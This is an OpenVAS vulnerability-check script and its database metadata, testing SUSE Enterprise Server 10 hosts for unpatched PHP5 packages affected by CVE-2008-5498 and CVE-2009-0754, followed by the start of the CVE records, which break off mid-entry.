More details may also be found by searching for the SuSE
Enterprise Server 10 patch database located at
http://download.novell.com/patch/finder/
#
#VID slesp2-apache2-mod_php5-6069
# OpenVAS Vulnerability Test
# $
# Description: Security update for PHP5
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_summary = "The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
apache2-mod_php5
php5
php5-bcmath
php5-bz2
php5-calendar
php5-ctype
php5-curl
php5-dba
php5-dbase
php5-devel
php5-dom
php5-exif
php5-fastcgi
php5-ftp
php5-gd
php5-gettext
php5-gmp
php5-iconv
php5-imap
php5-json
php5-ldap
php5-mbstring
php5-mcrypt
php5-mhash
php5-mysql
php5-ncurses
php5-odbc
php5-openssl
php5-pcntl
php5-pdo
php5-pear
php5-pgsql
php5-posix
php5-pspell
php5-shmop
php5-snmp
php5-soap
php5-sockets
php5-sqlite
php5-suhosin
php5-sysvmsg
php5-sysvsem
php5-sysvshm
php5-tokenizer
php5-wddx
php5-xmlreader
php5-xmlrpc
php5-xsl
php5-zlib
More details may also be found by searching for the SuSE
Enterprise Server 10 patch database located at
http://download.novell.com/patch/finder/";
tag_solution = "Please install the updates provided by SuSE.";
if(description)
{
script_id(65786);
script_version("$Revision: 6666 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $");
script_tag(name:"creation_date", value:"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)");
script_cve_id("CVE-2008-5498", "CVE-2009-0754");
script_tag(name:"cvss_base", value:"5.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_name("SLES10: Security update for PHP5");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("SuSE Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
res = "";
report = "";
if ((res = isrpmvuln(pkg:"apache2-mod_php5", rpm:"apache2-mod_php5~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5", rpm:"php5~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-bcmath", rpm:"php5-bcmath~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-bz2", rpm:"php5-bz2~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-calendar", rpm:"php5-calendar~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-ctype", rpm:"php5-ctype~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-curl", rpm:"php5-curl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-dba", rpm:"php5-dba~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-dbase", rpm:"php5-dbase~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-devel", rpm:"php5-devel~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-dom", rpm:"php5-dom~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-exif", rpm:"php5-exif~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-fastcgi", rpm:"php5-fastcgi~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-ftp", rpm:"php5-ftp~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-gd", rpm:"php5-gd~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-gettext", rpm:"php5-gettext~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-gmp", rpm:"php5-gmp~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-iconv", rpm:"php5-iconv~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-imap", rpm:"php5-imap~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-json", rpm:"php5-json~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-ldap", rpm:"php5-ldap~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-mbstring", rpm:"php5-mbstring~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-mcrypt", rpm:"php5-mcrypt~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-mhash", rpm:"php5-mhash~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-mysql", rpm:"php5-mysql~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-ncurses", rpm:"php5-ncurses~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-odbc", rpm:"php5-odbc~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-openssl", rpm:"php5-openssl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-pcntl", rpm:"php5-pcntl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-pdo", rpm:"php5-pdo~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-pear", rpm:"php5-pear~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-pgsql", rpm:"php5-pgsql~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-posix", rpm:"php5-posix~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-pspell", rpm:"php5-pspell~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-shmop", rpm:"php5-shmop~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-snmp", rpm:"php5-snmp~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-soap", rpm:"php5-soap~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-sockets", rpm:"php5-sockets~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-sqlite", rpm:"php5-sqlite~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-suhosin", rpm:"php5-suhosin~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-sysvmsg", rpm:"php5-sysvmsg~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-sysvsem", rpm:"php5-sysvsem~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-sysvshm", rpm:"php5-sysvshm~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-tokenizer", rpm:"php5-tokenizer~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-wddx", rpm:"php5-wddx~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-xmlreader", rpm:"php5-xmlreader~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-xmlrpc", rpm:"php5-xmlrpc~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-xsl", rpm:"php5-xsl~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"php5-zlib", rpm:"php5-zlib~5.2.5~9.14", rls:"SLES10.0")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"id": "OPENVAS:65786", "type": "openvas", "bulletinFamily": "scanner", "title": "SLES10: Security update for PHP5", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-10-13T00:00:00", "modified": "2017-07-11T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=65786", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2009-0754", "CVE-2008-5498"], "lastseen": "2017-07-26T08:55:58", "viewCount": 5, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2017-07-26T08:55:58", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5498", "CVE-2009-0754"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231065637", "OPENVAS:136141256231063827", "OPENVAS:63809", "OPENVAS:880938", "OPENVAS:65637", "OPENVAS:136141256231063809", "OPENVAS:1361412562310880871", "OPENVAS:136141256231065786", "OPENVAS:63827", "OPENVAS:63755"]}, {"type": "nessus", "idList": ["SUSE_APACHE2-MOD_PHP5-6069.NASL", "SUSE_11_1_APACHE2-MOD_PHP5-090312.NASL", "SUSE_11_0_APACHE2-MOD_PHP5-090312.NASL", "FREEBSD_PKG_58A3C266DB0111DDAE30001CC0377035.NASL", "ORACLELINUX_ELSA-2009-0337.NASL", "REDHAT-RHSA-2009-0337.NASL", "SLACKWARE_SSA_2009-098-02.NASL", "SUSE_APACHE2-MOD_PHP5-6068.NASL", "CENTOS_RHSA-2009-0337.NASL", "SUSE_11_APACHE2-MOD_PHP5-090319.NASL"]}, {"type": "redhat", "idList": ["RHSA-2009:0350", "RHSA-2009:0338", "RHSA-2009:0337"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-0337", "ELSA-2009-0338"]}, {"type": "slackware", "idList": ["SSA-2009-098-02"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:8031F12D158C68C17F94DE3A1736800F"]}, {"type": "seebug", "idList": ["SSV:15209", "SSV:10377", "SSV:66122", "SSV:4604"]}, {"type": "centos", "idList": ["CESA-2009:0337", "CESA-2009:0338"]}, {"type": "freebsd", "idList": ["58A3C266-DB01-11DD-AE30-001CC0377035"]}, {"type": "exploitdb", "idList": ["EDB-ID:7646", "EDB-ID:32769"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9711", "SECURITYVULNS:DOC:21425"]}, {"type": "ubuntu", "idList": ["USN-761-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1789-1:B5F1B"]}, {"type": "gentoo", "idList": ["GLSA-201001-03"]}], "modified": "2017-07-26T08:55:58", "rev": 2}, "vulnersScore": 6.7}, "pluginID": "65786", "sourceData": "#\n#VID slesp2-apache2-mod_php5-6069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for PHP5\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n apache2-mod_php5\n php5\n php5-bcmath\n php5-bz2\n php5-calendar\n php5-ctype\n php5-curl\n php5-dba\n php5-dbase\n php5-devel\n php5-dom\n php5-exif\n php5-fastcgi\n php5-ftp\n php5-gd\n php5-gettext\n php5-gmp\n php5-iconv\n php5-imap\n php5-json\n php5-ldap\n php5-mbstring\n php5-mcrypt\n php5-mhash\n php5-mysql\n php5-ncurses\n php5-odbc\n php5-openssl\n php5-pcntl\n php5-pdo\n php5-pear\n php5-pgsql\n php5-posix\n php5-pspell\n php5-shmop\n php5-snmp\n php5-soap\n php5-sockets\n php5-sqlite\n php5-suhosin\n php5-sysvmsg\n php5-sysvsem\n php5-sysvshm\n php5-tokenizer\n php5-wddx\n php5-xmlreader\n php5-xmlrpc\n php5-xsl\n php5-zlib\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 10 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_id(65786);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2008-5498\", \"CVE-2009-0754\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SLES10: Security update for PHP5\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"apache2-mod_php5\", rpm:\"apache2-mod_php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5\", rpm:\"php5~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bcmath\", rpm:\"php5-bcmath~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-bz2\", rpm:\"php5-bz2~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-calendar\", rpm:\"php5-calendar~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ctype\", rpm:\"php5-ctype~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-curl\", rpm:\"php5-curl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dba\", rpm:\"php5-dba~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dbase\", rpm:\"php5-dbase~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-devel\", rpm:\"php5-devel~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-dom\", rpm:\"php5-dom~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-exif\", rpm:\"php5-exif~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-fastcgi\", rpm:\"php5-fastcgi~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ftp\", rpm:\"php5-ftp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gd\", rpm:\"php5-gd~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gettext\", rpm:\"php5-gettext~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-gmp\", rpm:\"php5-gmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-iconv\", rpm:\"php5-iconv~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-imap\", rpm:\"php5-imap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-json\", rpm:\"php5-json~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ldap\", rpm:\"php5-ldap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mbstring\", rpm:\"php5-mbstring~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mcrypt\", rpm:\"php5-mcrypt~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mhash\", rpm:\"php5-mhash~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-mysql\", rpm:\"php5-mysql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-ncurses\", rpm:\"php5-ncurses~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-odbc\", rpm:\"php5-odbc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-openssl\", rpm:\"php5-openssl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pcntl\", rpm:\"php5-pcntl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pdo\", rpm:\"php5-pdo~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pear\", rpm:\"php5-pear~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pgsql\", rpm:\"php5-pgsql~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-posix\", rpm:\"php5-posix~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-pspell\", rpm:\"php5-pspell~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-shmop\", rpm:\"php5-shmop~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-snmp\", rpm:\"php5-snmp~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-soap\", rpm:\"php5-soap~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sockets\", rpm:\"php5-sockets~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sqlite\", rpm:\"php5-sqlite~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-suhosin\", rpm:\"php5-suhosin~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvmsg\", rpm:\"php5-sysvmsg~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvsem\", rpm:\"php5-sysvsem~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-sysvshm\", rpm:\"php5-sysvshm~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-tokenizer\", rpm:\"php5-tokenizer~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-wddx\", rpm:\"php5-wddx~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlreader\", rpm:\"php5-xmlreader~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xmlrpc\", rpm:\"php5-xmlrpc~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-xsl\", rpm:\"php5-xsl~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"php5-zlib\", rpm:\"php5-zlib~5.2.5~9.14\", rls:\"SLES10.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "SuSE Local Security Checks", "immutableFields": []}
{"cve": [{"lastseen": "2021-04-21T20:41:40", "description": "Array index error in the imageRotate function in PHP 5.2.8 and earlier allows context-dependent attackers to read the contents of arbitrary memory locations via a crafted value of the third argument (aka the bgd_color or clrBack argument) for an indexed image.", "edition": 7, "cvss3": {}, "published": "2008-12-26T20:30:00", "title": "CVE-2008-5498", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5498"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:php:php:5.1.5", "cpe:/a:php:php:5.2.1", "cpe:/a:php:php:5.0", "cpe:/a:php:php:5.0.1", "cpe:/a:php:php:5.2.6", "cpe:/a:php:php:5.1.4", "cpe:/a:php:php:5.1.3", "cpe:/a:php:php:5.1.6", "cpe:/a:php:php:5", "cpe:/a:php:php:5.2.3", "cpe:/a:php:php:5.2.5", "cpe:/a:php:php:5.0.2", "cpe:/a:php:php:5.2.4", "cpe:/a:php:php:5.1.0", "cpe:/a:php:php:5.2.0", "cpe:/a:php:php:5.0.4", "cpe:/a:php:php:5.2.8", "cpe:/a:php:php:5.1.1", "cpe:/a:php:php:5.2.2", "cpe:/a:php:php:5.0.5", "cpe:/a:php:php:5.0.3", "cpe:/a:php:php:5.2.7", "cpe:/a:php:php:5.1.2", "cpe:/a:php:php:5.0.0"], "id": "CVE-2008-5498", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5498", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-04-21T20:47:46", "description": "PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other 